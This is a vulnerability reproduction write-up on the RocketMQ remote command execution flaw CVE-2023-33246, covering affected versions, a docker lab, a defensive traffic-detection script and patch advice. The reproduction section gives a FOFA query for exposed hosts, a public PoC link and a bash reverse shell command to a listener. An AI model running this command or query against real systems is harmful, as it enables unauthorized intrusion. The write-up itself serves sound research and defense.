Foreword
RocketMQ is a distributed message middleware developed by Alibaba in 2012, designed for trillion-level, ultra-large-scale message processing. It is characterized by high throughput, low latency, massive message accumulation and ordered sending and receiving. It is also a distributed messaging and streaming data platform with low latency, high performance, high reliability, trillion-level capacity and flexible scalability.
Statement
This article is only used for vulnerability reproduction and technical research. Please do not use the techniques in the article for illegal testing. All adverse consequences have nothing to do with the author of the article. This article is for educational purposes only!
1. Vulnerability description
In RocketMQ 5.1.0 and below, there is a risk of remote command execution under certain conditions. Because several RocketMQ components (NameServer, Broker, Controller and so on) are exposed to the external network without permission verification, an attacker can exploit this vulnerability through the update configuration function to execute commands as the system user RocketMQ runs as. An attacker can also achieve the same effect by forging the content of the RocketMQ protocol.
2. Vulnerability hazards
An attacker can execute commands as the system user under which RocketMQ runs by using the update configuration function. Attackers can also achieve the same effect by forging the content of the RocketMQ protocol.
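The following is an added example (not code from the original post or from the RocketMQ project) that decodes RocketMQ remoting frames and flags configuration-update requests, the function described above, so that such requests can be spotted in captured broker or NameServer traffic. The frame layout and the request code values 25 (UPDATE_BROKER_CONFIG) and 318 (UPDATE_NAMESRV_CONFIG) are taken from the RocketMQ remoting protocol and are assumptions of this example, not values stated on the page.

```python
# Added example: decode RocketMQ remoting frames and flag configuration-update
# requests so an unauthenticated update can be spotted in captured traffic.
# Frame layout and request codes are assumptions from the RocketMQ remoting
# protocol; they are not stated on this page.
import json
import struct

# RemotingCommand request codes for the "update configuration" function.
UPDATE_BROKER_CONFIG = 25
UPDATE_NAMESRV_CONFIG = 318
CONFIG_UPDATE_CODES = {UPDATE_BROKER_CONFIG, UPDATE_NAMESRV_CONFIG}


def decode_frame(frame: bytes) -> dict:
    """Split one frame into its JSON header dict and raw body bytes.

    Layout: 4-byte total length, 4-byte (serialize type << 24 | header
    length), header bytes, body bytes. Only JSON headers (type 0) are handled.
    """
    if len(frame) < 8:
        raise ValueError("frame too short")
    total_len, type_and_len = struct.unpack(">II", frame[:8])
    serialize_type, header_len = type_and_len >> 24, type_and_len & 0xFFFFFF
    if serialize_type != 0:
        raise ValueError("unsupported header serialization %d" % serialize_type)
    if total_len != len(frame) - 4 or header_len > total_len - 4:
        raise ValueError("length fields do not match frame size")
    header = json.loads(frame[8:8 + header_len].decode("utf-8"))
    return {"header": header, "body": frame[8 + header_len:4 + total_len]}


def is_config_update(frame: bytes) -> bool:
    """True when the frame is a config-update request (not a response)."""
    header = decode_frame(frame)["header"]
    # Bit 0 of "flag" marks a response; requests have it clear.
    if header.get("flag", 0) & 1:
        return False
    return header.get("code") in CONFIG_UPDATE_CODES


def build_fixture(code: int, body: bytes, flag: int = 0) -> bytes:
    """Constructed sample frame for offline testing, not captured traffic."""
    header = json.dumps({"code": code, "flag": flag, "opaque": 1}).encode()
    total_len = 4 + len(header) + len(body)
    return struct.pack(">II", total_len, len(header)) + header + body


if __name__ == "__main__":
    sample = build_fixture(UPDATE_BROKER_CONFIG, b"brokerName=broker-a")
    print(is_config_update(sample))  # True
```

Run it against frames reassembled from a capture of the broker (10911) or NameServer (9876) port; any config-update request from a source that is not an administrator is worth an alert, since the affected versions do not check permissions.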
3. Affected versions
- Apache RocketMQ <= 5.1.0
- Apache RocketMQ <= 4.9.5
Fixed versions:
- Apache RocketMQ 5.x >= 5.1.1
- Apache RocketMQ 4.x >= 4.9.6
4. Environment setup
This time, docker is used directly to pull the vulnerable environment.
Download the docker images:
docker pull apache/rocketmq:4.9.1
docker pull apacherocketmq/rocketmq-console:2.0.0
Start namesrv:
docker run -d -p 9876:9876 -v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv
Start the broker service (first create and configure the broker configuration file).
Create the broker configuration directory:
mkdir -p /mydata/rocketmq/conf/
Edit the broker configuration file:
vim /mydata/rocketmq/conf/broker.conf
Copy the following content into broker.conf:
brokerClusterName = DefaultCluster
brokerName = broker-a
brokerId = 0
deleteWhen = 04
fileReservedTime = 48
brokerRole = ASYNC_MASTER
flushDiskType = SYNC_FLUSH
brokerIP1 = X.X.X.X (host machine IP)
Start the broker:
docker run -d -p 10911:10911 -p 10909:10909 -v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /mydata/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /opt/rocketmq/conf/broker.conf
Start Console:
docker run -d --name rmqconsole -p 8899:8080 -e "JAVA_OPTS=-Drocketmq.config.namesrvAddr=rmqnamesrv:9876 -Drocketmq.config.isVIPChannel=false" apacherocketmq/rocketmq-console:2.0.0
Finally, visit IP:8899. The console page is displayed as follows:
The environment has been built successfully!
5. Vulnerability reproduction
FOFA: title="RocketMQ"
PoC
GitHub download address: https://github.com/Serendipity-Lucky/CVE-2023-33246
Use the following command to obtain a reverse shell.
PS: When testing locally, the IP that receives the reverse shell cannot be the same as the IP of the host on which the docker environment was started, otherwise the shell cannot be received.
Command: java -jar CVE-2023-33246.jar -ip "X.X.X.X" -cmd "bash -i >& /dev/tcp/X.X.X.X/4444 0>&1"
6. Repair suggestions
The official security fix has been released; affected users can upgrade to Apache RocketMQ 5.1.1 or 4.9.6:
https://rocketmq.apache.org/download/
https://vip.tophant.com/patch?keyword=/Apache/Apache%20RocketMQ/Apache%20RocketMQ%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-33246)